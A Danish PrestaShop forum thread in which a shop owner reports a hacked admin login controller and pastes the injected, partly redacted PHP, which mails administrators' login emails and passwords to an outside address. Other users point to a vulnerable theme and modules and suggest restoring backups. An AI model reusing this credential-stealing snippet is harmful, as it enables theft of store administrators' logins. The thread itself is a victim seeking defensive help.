Hacket på version 1.6.1.6 med warehouse tema

[RiffeDK]

Hej Alle,

 

Er på bar bund, filen "controllers/admin/AdminLoginController.php" bliver overskrevet konstant trods seneste version af PS og seneste udgave af valgte tema. Det skal siges jeg befinder mig i tech niche med hård konkurrence.

 

Heri befinder sig nu bl.a. kode som:

public function processLogin()
    {
        /* Check fields validity */
        $passwd = trim(Tools::getValue('passwd'));
        $email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: webstore with login <email>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by xxxx -- xxxxx :v \r\n";
***
$*** = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
        if (empty($****)) {
            $this->errors[] = ****::displayError('Email is empty.');
        } elseif (!Validate::isEmail($email)) {
            $this->errors[] = Tools::displayError('Invalid email address.');
        }

*Har ikke indsat hele kildekoden og lidt er ændret da jeg ikke ved hvor meget der må publiceres her.

 

Ved at udskifte modtager-email bliver ansattes login data simpelthen sendt direkte til min indbakke i plain tekst. (er chokeret). 

 

Mailen jeg modtager hver gang ser således ud:

Link : http://******.dk/****/ajax-tab.php?rand=****
 email: ****@****
 pass: *****
 by *****
Path : /home/*****/public_html/controllers/admin/AdminLoginController.php

Er der nogen med samme problem eller har et forslag til hvad der foregår? Ligeledes skal en side som "" sende x til login-siden for backend?

 

Tak.

[Prestafan1234]

Har du kontaktet udvikleren af themet? Lige præcis Warehouse themet startede jo en bølge af shops der blev hacket.

 

Hvis themet ikke er årsagen, kan det være, du har et andet 3. parts modul, der ikke er sikkert.

 

I første omgang ville jeg starte med at indlæse en backup af shopfiler for at få ryddet op i hackede filer - men dernæst skal årsagen selvfølgelig findes, så det ikke sker igen.

[Guest]

Det Prestafan1234 skriver om, kan du læse mere om i denne tråd: https://www.prestashop.com/forums/topic/544579-major-security-issues-with-few-modules-and-themes/

[RiffeDK]

Tak for jeres besvarelser.

 

Ja er bekendt med at der tidligere har været problematikker med nævnte tema, seneste security patches har dog været installeret og ligeledes seneste tema udgivelse. Bruger ikke andre moduler end de der medfølger temaet og så tawk.to livechat modulet installeret samt modul fra Quickpay og Buddystore.

 

Udvikler er kontaktet men intet brugbart svar kommet og går også meget langsomt. - Betalte en virksomhed for "cleanup" af Prestashop installationen så der skulle være styr på installationen og hostingen er jeg sikker på, intet fejler de mange andre benytter denne Danske leverandør og nok er er en de mest anvendte hvis ikke den. Ligeledes skulle der være koblet noget WAF på men har jo åbenlyst ikke virket lige på dette.

 

Jeg fandt frem til denne video 

(håber der må linkes) der har skylden for overskrivelse af filerne samt er det også denne person, der har gjort..så mail, kodeord mv er landet til hans mail. Fik en med lidt mere know-how til at kigge på logs der blot kan sige at vpn eller proxy er anvendt *Bemærk hæslig lyd i videoen der linkes til. Er der evt. en herinde der kan se hvad der foregår i denne så jeg ved hvad der skal kigges efter?

 

*Rettelse foretaget da jeg glemte at nævne følgende: 

Er med på at der står "Remout File Upload" og det er dette, hullet omhandler men er der andre filer end i temaet hvor dette kan finde sted? Er det stadig et problem må jeg jo bare kigge andre veje da dette er skidt for omsætningen.

Edited August 11, 2016 by RiffeDK (see edit history)

[Prestafan1234]

Hej

 

Som jeg ser det, er der følgende årsager:

 

1. Der er ikke ryddet ordenligt op efter angreb (hvordan blev der ryddet op?)

2. Du har stadig moduler, der er sårbare og din shop vil blive angrebet igen, indtil hullet lukkes

 

Du er nødt til at finde ud af, hvor der bliver ændret filer for at finde hullet. Det er ikke til at sige, hvor de kommer ind i din shop, da vi jo ikke kender dit setup eller kan se, hvad der er ændret.

 

Din hosting har ikke nødvendigvis noget at sige mht. om din shop er sikker eller ej, hvis du har et sikkerhedshul i din installation.